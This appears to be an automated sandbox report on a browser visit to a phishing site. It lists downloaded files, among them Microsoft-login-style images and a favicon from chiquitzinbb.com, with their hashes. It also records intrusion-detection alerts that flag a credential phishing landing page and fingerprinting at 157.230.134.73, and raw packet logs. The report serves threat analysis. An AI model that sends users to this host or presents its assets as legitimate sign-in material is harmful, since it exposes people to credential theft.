                                        Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:SVG Scalable Vector Graphics image
                                        Category:downloaded
                                        Size (bytes):1636
                                        Entropy (8bit):4.214613323368661
                                        Encrypted:false
                                        SSDEEP:24:t4pb8W1baAcycV1i21AL5Xr/fJzWTtDYnpTyuwa+BDhMXeDFF6+/OKgXOgWKZsHz:zdyb2+jfJz+sFyN3BdMeFF52KgeTksHz
                                        MD5:F7AB697E65B83CE9870A4736085DEEEC
                                        SHA1:5FF40BFF26B523FBBEAA5228A2AAC63E44AFAA90
                                        SHA-256:CBB3706E65B35A43BDCFEBD23B5479DC0542CA7E23197869B683D12B524472FE
                                        SHA-512:158874143CE65485348813431BB585227772F315234E08158A329DF98319AA5F1DB21DEF2AD7CAA5C25AD11660E7D4E05158CFA1198913A33B1B91676C4CA402
                                        Malicious:false
                                        Reputation:low
                                        URL:https://aadcdn.msftauth.net/shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svg
                                        Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M38,14H10V34H38V14m2,22H8V12H40V36M17.688,18.8V28.828H15.531V21.234a3.2,3.2,0,0,1-.672.43l-.266.117a2.55,2.55,0,0,1-.562.188,2.423,2.423,0,0,1-.3.07q-.141.023-.281.055V20.266q.422-.125.813-.281t.766-.344a8.253,8.253,0,0,0,1.344-.844h1.313m4.531,8.234h4.156v1.8H19.859v-.75a3.292,3.292,0,0,1,.25-1.344,4.183,4.183,0,0,1,.625-1.078,5.7,5.7,0,0,1,.844-.828q.219-.187.438-.352t.422-.32q.453-.312.766-.578a2.593,2.593,0,0,0,.3-.281l.25-.281a3.148,3.148,0,0,0,.328-.562,1.59,1.59,0,0,0,.109-.609,1.176,1.176,0,0,0-.359-.937,1.552,1.552,0,0,0-1.078-.328,3.625,3.625,0,0,0-2.422,1V19.688a4.866,4.866,0,0,1,1.359-.625,5.548,5.548,0,0,1,1.516-.2,4.456,4.456,0,0,1,1.344.188,2.461,2.461,0,0,1,1,.563,2.242,2.242,0,0,1,.625.875,3.007,3.007,0,0,1,.219,1.156,3.538,3.538,0,0,1-.055.641,3.7,3.7,0,0,1-.148.563,3.439,3.439,0,0,1-.562.953,7.2,7.2,0,0,1-.8.8q-.21
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
                                        Category:downloaded
                                        Size (bytes):673
                                        Entropy (8bit):7.6596900876595075
                                        Encrypted:false
                                        SSDEEP:12:Xl0t8TUViiYi5m6FhSBXWPsigK99WCqKMvBBFThSqfLd81CK6bC+k7LqZLsFlD:XFUVpkNK0Rwid81p6btk7LqZ6D
                                        MD5:0E176276362B94279A4492511BFCBD98
                                        SHA1:389FE6B51F62254BB98939896B8C89EBEFFE2A02
                                        SHA-256:9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
                                        SHA-512:8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
                                        Malicious:false
                                        Reputation:low
                                        URL:https://aadcdn.msauth.net/shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg
                                        Preview:...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q...*..~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1.....*.#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 7390
                                        Category:downloaded
                                        Size (bytes):2407
                                        Entropy (8bit):7.900400471609788
                                        Encrypted:false
                                        SSDEEP:48:XVBUIsjnR4Zg0ddZ8E5EyQk7J0e+r/9lifUUuHDM3oOY+:XUIIKZg0ddZdEzTsfUUmyY+
                                        MD5:9D372E951D45A26EDE2DC8B417AAE4F8
                                        SHA1:84F97A777B6C33E2947E6D0BD2BFCFFEC601785A
                                        SHA-256:4E9C9141705E9A4D83514CEE332148E1E92126376D049DAED9079252FA9F9212
                                        SHA-512:78F5AA71EA44FF18BA081288F13AD118DB0E1B9C8D4D321ED40DCAB29277BD171BBB25BA7514566BBD4E25EA416C066019077FAA43E6ED781A29ADB683D218E2
                                        Malicious:false
                                        Reputation:low
                                        URL:https://aadcdn.msauth.net/shared/1.0/content/images/picker_verify_fluent_authenticator_59892f1e05e3adf9fd2f71b42d92a27f.svg
                                        Preview:...........Y=s.8......mr...f.y....8.R...l.Nk.l..?....{$.l|e'zM.3...............S(..........O./......Mn.e..O..7.O.?=..?........../...~yy._t....8.a........~.....+..$..*..z..\....~..Jx|............|y...=................./.3....kN2...H...;<sy....H..?2..q5.0.0....f......L.^..v.W.L..7XCm8.I...6\.p.....O/%sX..I.......u............yE......$q....1/.....W....Zg...w..-..v....x...N)........R....c.W5.=...{_1_...+.#.......e...K..:..b.Ec...!...".I1../2X.....].i.sAF;^.1....1/UM.[r..d...>RX..U...<..1...V.|.......X.jX:..0...9..F.KsT...{.6,.._Q..9.b...Q)..0.R.t.u.JN..u$V.%X.9k..t.."..Q.........y.V.Z$7.q.{......k.......W....5.x..K.."y...=......4...h|!....r.."v\f`..c+.......b..hc.jn....0.&G..m.=.@..6../......6....tM^.&3.$......~.....m2...wFs..#5.Hy..?...r.p.O.X.'n...Z8L......7.;..QWGnr.sY..n...3.Jfq..+{m....\...X.q...0...0...........}}d...33.....Q...F$.8..v..UH&.H........0.q..n...q...F.Y7...u..B>..J.A.....$.,....w......Z..oe..w..%....$[+.......d...
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                        Category:downloaded
                                        Size (bytes):2228
                                        Entropy (8bit):7.82817506159911
                                        Encrypted:false
                                        SSDEEP:48:4/6MuQu6DYYEcBDlBVzqawiHI1Oupgl8m7NCnagQJFknwD:4SabhtXqMHyCl8m7N0ag6D
                                        MD5:EF9941290C50CD3866E2BA6B793F010D
                                        SHA1:4736508C795667DCEA21F8D864233031223B7832
                                        SHA-256:1B9EFB22C938500971AAC2B2130A475FA23684DD69E43103894968DF83145B8A
                                        SHA-512:A0C69C70117C5713CAF8B12F3B6E8BBB9CDAF72768E5DB9DB5831A3C37541B87613C6B020DD2F9B8760064A8C7337F175E7234BFE776EEE5E3588DC5662419D9
                                        Malicious:false
                                        Reputation:low
                                        URL:https://www.gstatic.com/recaptcha/api2/logo_48.png
                                        Preview:.PNG........IHDR...0...0.....W.......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......pHYs.................IDATh...P....=..8.....Nx. ..PlP8..;.C.1iL#6...*.Z..!......3.po .o.L.i.I..1fl..4..ujL&6$...............w...........,Z..z. ~.....\.._.C.eK...g..%..P..L7...96..q....L.....k6...*..,xz.._......B."#...L(n..f..Yb...*.8.;....K)N...H).%.F"Ic.LB.........jG.uD..B....Tm....T..).A.}D.f..3.V.....O.....t_..].x.{o......*....x?!W...j..@..G=Ed.XF.........J..E?../]..?p..W..H..d5% WA+.....)2r..+..'qk8.../HS.[...u..z.P.*....-.A.}.......I .P.....S....|...)..KS4....I.....W...@....S.s..s..$`.X9.....E.x.=.u.*iJ...........k......'...!.a....*+.....(...S..\h....@............I.$..%.2....l......a.|.....U....y.....t..8....TF.o.p.+.@<.g........-.M.....:.@..(.......@......>..=.ofm.WM{...e..,..D.r.......w....T.L.os..T@Rv..;.....9....56<.x...........2.k.1....dd.V.....m..y5../4|...G.p.V.......6...}.....B........5...&..v..yTd.6...../m.K...(.
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:MS Windows icon resource - 7 icons, 256x256 with PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced, 32 bits/pixel, -128x-128, 32 bits/pixel
                                        Category:downloaded
                                        Size (bytes):113459
                                        Entropy (8bit):3.8705321549285747
                                        Encrypted:false
                                        SSDEEP:768:Beca3V/m1M2m2PXSoJTNpZXPOV2pzkkqCU63:BlGRQM2m2HJh/GVszkkFU
                                        MD5:1DB747255C64A30F9236E9D929E986CA
                                        SHA1:384023452346AA087D40C93C23CA2F5E32FF1B1F
                                        SHA-256:88BAF40FEB43463A8F6AA6543E88BDBE33F0DB9A317486E786EEE1E5C76A9544
                                        SHA-512:05D654610EBF0C5DE4CE828923C63E21D3164F4AEBCEC5DB2415BE23BD6965A50F5506EC8772C4624FAE266944A9CC596947D3C061F0F9602633103238C64267
                                        Malicious:false
                                        Reputation:low
                                        URL:https://chiquitzinbb.com/favicon.ico
                                        Preview:............ .-,..v......... .(....,..@@.... .(B...4..00.... ..%...v.. .... ............... .....C......... .h.......PNG........IHDR.............\r.f....pHYs..........o.d.. .IDATx..y`T....O23I&{ +K...$l.....U..Z[E.Vk[.m..Z....Z[.l..j.=a. ...H..,d.L&.}}.?b(*..7o...3..&..}.s.9...2...!"Q..... .D............ ."."..B....7....R..\..@......~....R.....2.............. ."."..B.C..@.`.........!.!.@ D0D......r....G....`.................#........|.5.....y..,...?.(..W!.X!..`OC..[.'.1.U5..e...D.. S"..P|.5.1.>?6.4....Ax..0...zV.!..&b....V....v.jG....X...D........Ea]U.k...B.A....x..c.A.D...y|8.lau..N+j.zY..@......'.......8..R'"..........DX.uXq.?6..K9..@.D..,!.BI.7..ewcOC..7f.+.Y.n<W|...>....5v......U........P..^.....8.x.A....._Z....l.A6.4c.{......@.6......A6....g.,E...0....%......s..........T..;.B....~...<...ZmNV...r...|.F....-X......h...w>.a..m@...d...y.\.|..n.........(|i..]...Y..u.]8.aea....1....>....[....j.omDu'...!2.T.(.x...q........V.c.k..M.`.S...K86...]..~.E..
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
                                        Category:dropped
                                        Size (bytes):673
                                        Entropy (8bit):7.6596900876595075
                                        Encrypted:false
                                        SSDEEP:12:Xl0t8TUViiYi5m6FhSBXWPsigK99WCqKMvBBFThSqfLd81CK6bC+k7LqZLsFlD:XFUVpkNK0Rwid81p6btk7LqZ6D
                                        MD5:0E176276362B94279A4492511BFCBD98
                                        SHA1:389FE6B51F62254BB98939896B8C89EBEFFE2A02
                                        SHA-256:9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
                                        SHA-512:8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
                                        Malicious:false
                                        Reputation:low
                                        Preview:...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q...*..~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1.....*.#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:Unicode text, UTF-8 (with BOM) text
                                        Category:downloaded
                                        Size (bytes):23427
                                        Entropy (8bit):5.112735417225198
                                        Encrypted:false
                                        SSDEEP:384:1HHLO7eS0F4bBY/fn6jZcy9/cGK1q8CarY64Cb+dOy:1HHCLYXfl1q8CarY64Cb+dl
                                        MD5:BA0537E9574725096AF97C27D7E54F76
                                        SHA1:BD46B47D74D344F435B5805114559D45979762D5
                                        SHA-256:4A7611BC677873A0F87FE21727BC3A2A43F57A5DED3B10CE33A0F371A2E6030F
                                        SHA-512:FC43F1A6B95E1CE005A8EFCDB0D38DF8CC12189BEAC18099FD97C278D254D5DA4C24556BD06515D9D6CA495DDB630A052AEFC0BB73D6ED15DEBC0FB1E8E208E7
                                        Malicious:false
                                        Reputation:low
                                        URL:https://www.w3schools.com/w3css/4/w3.css
                                        Preview:./* W3.CSS 4.15 December 2020 by Jan Egil and Borge Refsnes */.html{box-sizing:border-box}*,*:before,*:after{box-sizing:inherit}./* Extract from normalize.css by Nicolas Gallagher and Jonathan Neal git.io/normalize */.html{-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}.article,aside,details,figcaption,figure,footer,header,main,menu,nav,section{display:block}summary{display:list-item}.audio,canvas,progress,video{display:inline-block}progress{vertical-align:baseline}.audio:not([controls]){display:none;height:0}[hidden],template{display:none}.a{background-color:transparent}a:active,a:hover{outline-width:0}.abbr[title]{border-bottom:none;text-decoration:underline;text-decoration:underline dotted}.b,strong{font-weight:bolder}dfn{font-style:italic}mark{background:#ff0;color:#000}.small{font-size:80%}sub,sup{font-size:75%;line-height:0;position:relative;vertical-align:baseline}.sub{bottom:-0.25em}sup{top:-0.5em}figure{margin:1em 40px}img{border-style:none}.code,kbd,p
                                        No static file info
                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                        2024-10-24T03:40:22.054254+02002056643ET PHISHING Javascript Browser Fingerprinting POST Request2192.168.2.1649703157.230.134.73443TCP
                                        2024-10-24T03:40:23.094479+02002056316ET PHISHING Generic Credential Phish Landing Page (jsnom.js)1192.168.2.1649707157.230.134.73443TCP
                                        2024-10-24T03:40:24.916128+02002056316ET PHISHING Generic Credential Phish Landing Page (jsnom.js)1192.168.2.1649710157.230.134.73443TCP
                                        TimestampSource PortDest PortSource IPDest IP
                                        Oct 24, 2024 03:40:18.047178984 CEST49673443192.168.2.16204.79.197.203
                                        Oct 24, 2024 03:40:18.349884033 CEST49673443192.168.2.16204.79.197.203
                                        Oct 24, 2024 03:40:18.957804918 CEST49673443192.168.2.16204.79.197.203
                                        Oct 24, 2024 03:40:20.166863918 CEST49673443192.168.2.16204.79.197.203
                                        Oct 24, 2024 03:40:20.607928991 CEST49703443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:20.608014107 CEST44349703157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:20.608098030 CEST49703443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:20.608386993 CEST49704443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:20.608409882 CEST44349704157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:20.608463049 CEST49704443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:20.608611107 CEST49703443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:20.608647108 CEST44349703157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:20.608726978 CEST49704443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:20.608743906 CEST44349704157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:21.011231899 CEST4968980192.168.2.16192.229.211.108
                                        Oct 24, 2024 03:40:21.454544067 CEST44349704157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:21.454895973 CEST49704443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:21.454906940 CEST44349704157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:21.455558062 CEST44349703157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:21.455801010 CEST49703443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:21.455862999 CEST44349703157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:21.456545115 CEST44349704157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:21.456612110 CEST49704443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:21.457510948 CEST44349703157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:21.457586050 CEST49703443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:21.457680941 CEST49704443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:21.457765102 CEST44349704157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:21.458297014 CEST49704443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:21.458303928 CEST44349704157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:21.458627939 CEST49703443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:21.458722115 CEST44349703157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:21.502793074 CEST49703443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:21.502798080 CEST49704443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:21.502811909 CEST44349703157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:21.550884962 CEST49703443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:21.972584963 CEST44349704157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:21.972748995 CEST44349704157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:21.972872019 CEST49704443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:21.972889900 CEST44349704157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:21.973902941 CEST49704443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:21.973999023 CEST44349704157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:21.974076033 CEST49704443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:22.051985025 CEST49707443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:22.052030087 CEST44349707157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:22.052139044 CEST49707443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:22.052390099 CEST49703443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:22.052521944 CEST49703443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:22.052582979 CEST44349703157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:22.052767038 CEST49707443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:22.052778006 CEST44349707157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:22.052886963 CEST49703443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:22.052941084 CEST44349703157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:22.054017067 CEST49703443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:22.054075956 CEST44349703157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:22.054256916 CEST49703443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:22.054303885 CEST44349703157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:22.054348946 CEST49703443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:22.054348946 CEST49703443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:22.054371119 CEST44349703157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:22.054400921 CEST44349703157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:22.054490089 CEST49703443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:22.054507017 CEST44349703157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:22.569914103 CEST49673443192.168.2.16204.79.197.203
                                        Oct 24, 2024 03:40:22.738837957 CEST44349707157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:22.739278078 CEST49707443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:22.739366055 CEST44349707157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:22.740741968 CEST44349707157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:22.741080999 CEST49707443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:22.741178036 CEST44349707157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:22.793812990 CEST49707443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:22.909184933 CEST44349703157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:22.909559011 CEST44349703157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:22.912647009 CEST49703443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:22.913052082 CEST49703443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:22.913098097 CEST44349703157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:22.924619913 CEST49707443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:22.935848951 CEST49709443192.168.2.1618.245.31.33
                                        Oct 24, 2024 03:40:22.935890913 CEST4434970918.245.31.33192.168.2.16
                                        Oct 24, 2024 03:40:22.935981035 CEST49709443192.168.2.1618.245.31.33
                                        Oct 24, 2024 03:40:22.936196089 CEST49709443192.168.2.1618.245.31.33
                                        Oct 24, 2024 03:40:22.936216116 CEST4434970918.245.31.33192.168.2.16
                                        Oct 24, 2024 03:40:22.971330881 CEST44349707157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:23.094546080 CEST44349707157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:23.141974926 CEST49707443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:23.212511063 CEST44349707157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:23.212528944 CEST44349707157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:23.212596893 CEST44349707157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:23.212650061 CEST44349707157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:23.212687969 CEST44349707157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:23.212723970 CEST49707443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:23.212723970 CEST49707443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:23.212723970 CEST49707443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:23.212795973 CEST44349707157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:23.212848902 CEST49707443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:23.212869883 CEST49707443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:23.330934048 CEST44349707157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:23.331003904 CEST44349707157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:23.331082106 CEST49707443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:23.331149101 CEST44349707157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:23.331187010 CEST49707443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:23.331211090 CEST49707443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:23.449269056 CEST44349707157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:23.449325085 CEST44349707157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:23.449450016 CEST49707443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:23.449516058 CEST44349707157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:23.449553013 CEST49707443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:23.449574947 CEST49707443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:23.674796104 CEST44349707157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:23.674834967 CEST44349707157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:23.674884081 CEST44349707157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:23.674948931 CEST49707443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:23.674987078 CEST44349707157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:23.675023079 CEST49707443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:23.675045967 CEST49707443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:23.685825109 CEST44349707157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:23.685894966 CEST44349707157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:23.686095953 CEST49707443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:23.686095953 CEST49707443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:23.686172009 CEST44349707157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:23.686240911 CEST49707443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:23.796601057 CEST4434970918.245.31.33192.168.2.16
                                        Oct 24, 2024 03:40:23.797033072 CEST49709443192.168.2.1618.245.31.33
                                        Oct 24, 2024 03:40:23.797053099 CEST4434970918.245.31.33192.168.2.16
                                        Oct 24, 2024 03:40:23.798685074 CEST4434970918.245.31.33192.168.2.16
                                        Oct 24, 2024 03:40:23.798808098 CEST49709443192.168.2.1618.245.31.33
                                        Oct 24, 2024 03:40:23.799897909 CEST49709443192.168.2.1618.245.31.33
                                        Oct 24, 2024 03:40:23.799985886 CEST4434970918.245.31.33192.168.2.16
                                        Oct 24, 2024 03:40:23.800076008 CEST49709443192.168.2.1618.245.31.33
                                        Oct 24, 2024 03:40:23.800087929 CEST4434970918.245.31.33192.168.2.16
                                        Oct 24, 2024 03:40:23.803467989 CEST44349707157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:23.803529024 CEST44349707157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:23.803586006 CEST49707443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:23.803653002 CEST44349707157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:23.803685904 CEST44349707157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:23.803689957 CEST49707443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:23.803725958 CEST49707443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:23.803739071 CEST44349707157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:23.803819895 CEST49707443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:23.803850889 CEST44349707157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:23.803917885 CEST49707443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:23.804049015 CEST49707443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:23.804075003 CEST44349707157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:23.842806101 CEST49709443192.168.2.1618.245.31.33
                                        Oct 24, 2024 03:40:24.044966936 CEST4434970918.245.31.33192.168.2.16
                                        Oct 24, 2024 03:40:24.067737103 CEST49710443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:24.067795038 CEST44349710157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:24.067913055 CEST49710443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:24.068129063 CEST49710443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:24.068136930 CEST44349710157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:24.096792936 CEST49709443192.168.2.1618.245.31.33
                                        Oct 24, 2024 03:40:24.163930893 CEST4434970918.245.31.33192.168.2.16
                                        Oct 24, 2024 03:40:24.163973093 CEST4434970918.245.31.33192.168.2.16
                                        Oct 24, 2024 03:40:24.164082050 CEST49709443192.168.2.1618.245.31.33
                                        Oct 24, 2024 03:40:24.164102077 CEST4434970918.245.31.33192.168.2.16
                                        Oct 24, 2024 03:40:24.164118052 CEST4434970918.245.31.33192.168.2.16
                                        Oct 24, 2024 03:40:24.164155960 CEST49709443192.168.2.1618.245.31.33
